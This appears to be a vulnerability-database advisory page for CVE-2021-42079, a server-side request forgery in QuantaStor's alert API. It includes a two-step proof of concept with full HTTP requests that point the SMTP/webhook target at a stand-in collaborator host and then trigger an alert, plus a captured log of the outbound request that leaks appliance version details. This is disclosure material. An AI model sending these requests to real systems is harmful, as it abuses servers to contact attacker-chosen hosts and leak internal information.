VYPR
Medium severity6.2NVD Advisory· Published Jul 10, 2023· Updated Jun 17, 2026

CVE-2021-42079

CVE-2021-42079

Description

An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.

POC

Step 1: Prepare the SSRF with a request like this:

GET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http:// HTTP/1.1

Host: Accept-Encoding: gzip, deflate

Accept: */* Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36

Connection: close

authorization: Basic <BASIC_AUTH_HASH> Content-Type: application/json

Content-Length: 0

Step 2: Trigger this alert with this request

GET /qstorapi/alertRaise?title=test&message=test&severity=1 HTTP/1.1

Host: Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36

Connection: close

authorization: Basic <BASIC_AUTH_HASH> Content-Type: application/json

Content-Length: 1

The post request received by looks like this: {

Python

FLASK stuff

####

'endpoint': 'index',

'method': 'POST',

'cookies': ImmutableMultiDict([]),

END

Python FLASK stuff

####

'data': b'{ "attachments": [ {

"fallback": "[122] test / test.",

"color": "#aa2222",

"title": "[122] test",

"text": "test",

"fields": [ {

"title": "Alert Severity",

"value": "CRITICAL",

"short": false },  { "title": "Appliance", "value": "quantastor (https://)",

"short": true

},  {

"title": "System / Driver / Kernel Ver",

"value": "5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic",

"short": false

},  {

"title": "System Startup",

"value": "Fri Aug  6 16-02-55 2021",

"short": true

},  {

"title": "SSID",

"value": "f4823762-1dd1-1333-47a0-6238c474a7e7",

"short": true

}, ],

"footer": "QuantaStor Call-home Alert",

"footer_icon": " https://platform.slack-edge.com/img/default_application_icon.png ",

"ts": 1628461774 } ], "mrkdwn":true }',

FLASK

REQUEST STUFF #####

'headers': {

'Host': '', 'User-Agent': 'curl/7.58.0', 'Accept': '*/*', 'Content-Type': 'application/json', 'Content-Length': '790'

}, 'args': ImmutableMultiDict([]), 'form': ImmutableMultiDict([]), 'remote_addr': '217.103.63.173', 'path': '/payload/58', 'whois_ip': 'TNF-AS, NL' }

END

FLASK REQUEST STUFF #####

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected products

2

Patches

Vulnerability mechanics

References

5

News mentions

0

No linked articles in our index yet.